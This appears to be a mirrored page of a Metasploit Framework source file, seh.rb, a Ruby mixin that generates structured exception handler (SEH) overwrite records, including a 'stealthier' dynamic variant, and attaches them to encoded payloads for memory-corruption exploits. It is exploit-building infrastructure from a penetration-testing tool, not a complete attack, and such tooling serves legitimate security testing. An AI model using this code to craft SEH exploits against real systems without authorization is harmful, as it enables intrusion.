Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

seh.rb 1.9KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172
  1. # -*- coding: binary -*-
  2. require 'rex/exploitation/seh'
  3. module Msf
  4. ###
  5. #
  6. # This mixin provides an interface to generating SEH registration records in a
  7. # robust fashion using the Rex::Exploitation::Seh class.
  8. #
  9. ###
  10. module Exploit::Seh
  11. #
  12. # Creates an instance of an exploit that uses an SEH overwrite.
  13. #
  14. def initialize(info = {})
  15. super
  16. # Register an advanced option that allows users to specify whether or
  17. # not a dynamic SEH record should be used.
  18. register_advanced_options(
  19. [
  20. OptBool.new('DynamicSehRecord', [ false, "Generate a dynamic SEH record (more stealthy)", false ])
  21. ], Msf::Exploit::Seh)
  22. end
  23. #
  24. # Generates an SEH record with zero or more options. The supported options
  25. # are:
  26. #
  27. # NopGenerator
  28. #
  29. # The NOP generator instance to use, if any.
  30. #
  31. # Space
  32. #
  33. # The amount of room the SEH record generator has to play with for
  34. # random padding. This should be derived from the maximum amount of
  35. # space available to the exploit for payloads minus the current payload
  36. # size.
  37. #
  38. def generate_seh_record(handler, opts = {})
  39. seh = Rex::Exploitation::Seh.new(
  40. payload_badchars,
  41. opts['Space'] || payload_space,
  42. opts['NopGenerator'] || nop_generator)
  43. # Generate the record
  44. seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
  45. end
  46. def generate_seh_payload(handler, opts = {})
  47. # The boilerplate this replaces always has 8 bytes for seh + addr
  48. seh_space = 8 + payload.nop_sled_size
  49. seh = Rex::Exploitation::Seh.new(
  50. payload_badchars,
  51. seh_space,
  52. opts['NopGenerator'] || nop_generator)
  53. # Generate the record
  54. rec = seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
  55. # Append the payload, minus the nop sled that we replaced
  56. rec << payload.encoded.slice(payload.nop_sled_size, payload.encoded.length)
  57. end
  58. end
  59. end